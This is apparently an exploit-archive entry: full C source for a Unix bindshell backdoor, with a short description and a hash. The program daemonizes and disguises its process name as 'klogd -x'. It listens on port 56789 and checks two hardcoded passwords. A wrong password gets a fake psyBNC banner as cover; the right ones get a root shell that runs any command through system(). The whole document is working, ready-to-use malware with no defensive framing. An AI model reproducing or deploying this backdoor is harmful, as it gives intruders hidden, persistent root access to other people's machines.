Unix bindshell backdoor that acts as psybnc if the password fails.
a63b89c1bb3957fc31dcd23b35f32b931de760ccb72b148bd7de29831ebf59f6
/* simple bindshell that acts like a psybnc
* author: darkXside
* root@linuxkiddie.org
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/utsname.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <strings.h>
#include <fcntl.h>
#include <pwd.h>
#define password "q1w2e3r4"
#define password2 "r00tm3"
#define PORT 56789
#define HIDE "klogd -x"
#define user "root"
#ifdef sys
#endif
#define check(pass) strcmp(password, pass)
#define check2(pass2) strcmp(password2, pass2)
#define narf(buf) fgets(buf,256,stdin); if(*buf) buf[strlen(buf)-2]= '\0';
#define sddr struct sockaddr
#define LOG 5
static void box(void);
static void checked(void);
static void command(const char *input);
int r00t = 0, euid = 0;
flushit (char *toflush)
{
fflush (stdout);
fflush (stderr);
fflush (stdin);
}
int
main(int argc, char **argv)
{
int sockfd, connfd;
struct sockaddr_in servaddr;
struct passwd *pwd;
char pass[256];
char pass2[256];
char buf[246];
char input[80];
if (!geteuid()) {
++r00t;
if ( (pwd = getpwnam(user)) != NULL)
seteuid(euid = pwd->pw_uid);
}
if (fork() != 0)
exit(0);
memset(argv[0], ' ', strlen(argv[0]));
strcpy(argv[0], HIDE);
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0);
bzero(&servaddr, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(PORT);
servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
if (bind(sockfd, (sddr *)&servaddr, sizeof(servaddr)) < 0)
;
if (listen(sockfd, LOG) < 0);
for (;;) {
if ( (connfd = accept(sockfd, (sddr *)NULL, NULL)) < 0)
continue;
if (fork() != 0) {
dup2(connfd, STDIN_FILENO);
dup2(connfd, STDOUT_FILENO);
dup2(connfd, STDERR_FILENO);
close(connfd);
narf(pass);
if (check(pass) == 0) {
bzero(&pass, sizeof(pass));
printf("\nBackdoor by darkXside\n");
pwd = getpwuid (getuid());
if (pwd == NULL)
printf ("\n");
else
{
printf ("\n");
printf ("Enter the second password.\n");
fflush (stdout);
narf(pass2);
flushit (pass2);
if (check2(pass2) == 0) {
bzero(&pass2, sizeof(pass2));
printf ("\nPassword accepted!\n");
checked();
}
}
}
else
{
printf (":Welcome!psyBNC@lam3rz.de NOTICE * :psyBNC2.3.2-4\n");
exit (0);
}
exit(0);
}
close(connfd);
}
exit(0);
}
static void
box(void)
{
struct utsname buf;
char *dir;
dir = (char *) getcwd(NULL, 0);
printf ("[backdoor]# ");
fflush(stdout);
}
static void
checked(void)
{
char input[256];
chdir("/dev/.tty01");
for (;;) {
box();
narf(input);
seteuid(0);
command(input);
seteuid(euid);
}
}
static void
command(const char *input)
{
#ifdef sys
char cmd[256];
#endif
if (!strncmp(input, "cd ", 3)) {
if (chdir(input +3) < 0)
perror("chdir");
return ;
}
if (!strcmp(input, "exit")) {
printf("m\nSee ya later...\n");
exit(0);
}
system(input);
}